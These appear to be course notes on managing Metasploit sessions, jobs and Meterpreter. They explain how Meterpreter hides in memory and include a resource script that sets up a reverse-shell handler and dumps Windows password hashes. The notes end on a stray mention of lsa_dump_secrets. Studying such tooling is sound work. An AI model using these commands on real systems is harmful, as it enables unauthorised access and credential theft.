☑️MSF Sessions

Sessions

MSFconsole can manage multiple modules at the same time. This is one of the many reasons it provides the user with so much flexibility. This is done with the use of Sessions, which creates dedicated control interfaces for all of your deployed modules.

We can send a session to the background with the command background or by pressing CTRL+Z.

We can list all the active sessions with the command sessions, and then use the command sessions -i <no.> to get back into a specific session.

Jobs

If, for example, we are running an active exploit under a specific port and need this port for a different module, we cannot simply terminate the session using CTRL+C. If we did that, we would see that the port would still be in use, affecting our use of the new module. So instead, we would need to use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.

Other types of tasks inside sessions can also be converted into jobs to run in the background seamlessly, even if the session dies or disappears.

When we run an exploit, we can run it as a job by typing exploit -j. Per the help menu for the exploit command, adding -j to our command, instead of just exploit or run, will "run it in the context of a job."

Then use the command jobs -l to list all jobs and jobs -k <no.> to kill a specific job.

Meterpreter

The Meterpreter Payload is a specific type of multi-faceted, extensible Payload that uses DLL injection to ensure the connection to the victim host is stable and difficult to detect using simple checks and can be configured to be persistent across reboots or system changes. Furthermore, Meterpreter resides entirely in the memory of the remote host and leaves no traces on the hard drive, making it difficult to detect with conventional forensic techniques.

When the exploit is completed, the following events occur:

  • The target executes the initial stager. This is usually a bind, reverse, findtag, passivex, etc.

  • The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.

  • The Meterpreter core initializes, establishes an AES-encrypted link over the socket, and sends a GET. Metasploit receives this GET and configures the client.

  • Lastly, Meterpreter loads extensions. It will always load stdapi and load priv if the module gives administrative rights. All of these extensions are loaded over AES encryption.

Whenever the Meterpreter Payload is sent and run on the target system, we receive a Meterpreter shell.

Once in, we can send the current session to the background and run other post modules and exploits. We can use the command set SESSION <no.> to attach our existing session to the newly selected module, which is useful, for example, for privilege escalation.

We can also run hashdump to dump hashed credentials from the victim computer.
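The jobs and sessions workflow described above, written out as an msfconsole resource script. This is an added example, not part of the original notes; the listener address, port and session/job numbers are assumed lab values, and the script only handles a session that the operator has already obtained.

```msf
# Run with: msfconsole -r jobs_and_sessions.rc
# Assumed lab values: LHOST 10.10.14.5, LPORT 4444, first session id 1, first job id 0.
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
set ExitOnSession false   # keep the handler job alive after the first session arrives
exploit -j                # "run it in the context of a job": port 4444 is now held by the job, not the foreground
jobs -l                   # the handler shows up here as job 0

# The lines below assume a Meterpreter session has already checked in on the handler.
sessions -l               # confirm the session id before handing it to a post module
use post/windows/gather/hashdump
set SESSION 1             # attach the backgrounded session to this module instead of interacting with it
run

# CTRL+C would leave port 4444 in use; killing the job is what actually frees it
jobs -k 0
jobs -l                   # verify the job list is empty before reusing the port
```

The sessions -i <no.> command is omitted on purpose, since it drops into an interactive shell and would stall the rest of the script.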

We can use lsa_dump_secrets
